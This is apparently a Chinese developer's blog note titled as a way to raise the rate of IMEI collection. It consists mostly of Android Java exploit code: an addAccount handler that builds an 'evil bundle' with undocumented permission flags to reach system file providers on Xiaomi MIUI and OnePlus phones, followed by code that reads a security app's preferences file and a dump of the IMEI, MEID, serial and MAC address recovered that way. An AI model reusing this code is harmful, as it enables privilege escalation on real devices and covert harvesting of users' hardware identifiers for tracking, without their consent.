Notes
0%

【漏洞】IMEI采集率补偿

发表于 更新于 分类于 
设备唯一ID

MIUI11 提权限IMEI(系统缓存漏洞)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
@SuppressLint("WrongConstant")
    @Override
    public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
        Intent intent = new Intent();
        intent.setComponent(new ComponentName("com.xingin.pinduoduoexploit", "com.xingin.pinduoduoexploit.SuccessActivity"));
        intent.addFlags(Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS | Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
            intent.addFlags(Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
        }
        intent.addFlags(0x80000000); // FLAG_GRANT_SYSTEM_APP_URI_PERMISSION 小米的 🕳️
//        intent.setData(Uri.parse("content://com.xingin.xhs.provider/opensdk_root"));
        intent.setData(Uri.parse("content://com.miui.securitycore.fileProvider/root_files"));
        return createEvilBundle(evilIntent == null ? intent : evilIntent);
    }

提权后直接读取

1
2
3
4
5
6
7
try (InputStream is = getContentResolver().openInputStream(Uri.parse("content://com.miui.securitycore.fileProvider/root_files/data/user/0/com.miui.securitycenter/shared_prefs/mi_stat_pref.xml"))){
                    byte[] bytes = new byte[is.available()];
                    is.read(bytes);
                    Log.e("s1nk", new String(bytes));
                } catch (IOException e) {
                    Log.e("s1nk", "open file failed: ", e);
                }

包含信息如下

1
2
3
4
5
6
7
8
9
10
11
<string name="meid">99001084927914</string>
 <long name="l_t" value="1713258063176" />
 <string name="imei1">868030038557946</string>
 <long name="netSpeedTotalRxBytes" value="301975" />
 <float name="netSpeed" value="0.016664945" />
 <string name="serial">c9c2fd2c</string>
 <long name="s_t" value="1713258062704" />
 <long name="e_t" value="26082" />
 <boolean name="od_checked" value="true" />
 <long name="net_speed_time_stamp" value="1713846738919" />
 <string name="mac">9c:2e:a1:91:8c:e5</string>

一加后门

1
2
3
4
5
6
7
8
9
10
11
12
Intent intent = new Intent();
        intent.setComponent(new ComponentName("com.xingin.pinduoduoexploit", "com.xingin.pinduoduoexploit.SuccessActivity"));
        intent.addFlags(Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS | Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
            intent.addFlags(Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
        }
//        intent.addFlags(0x80000000); // FLAG_GRANT_SYSTEM_APP_URI_PERMISSION 小米的 🕳️
//        intent.setData(Uri.parse("content://com.xingin.xhs.provider/opensdk_root"));
        intent.addFlags(Integer.MIN_VALUE); // OnePlus 的🕳️
        intent.setData(Uri.parse("content://com.oneplus.filemanager.safefiles/root_path"));
        return createEvilBundle(evilIntent == null ? intent : evilIntent);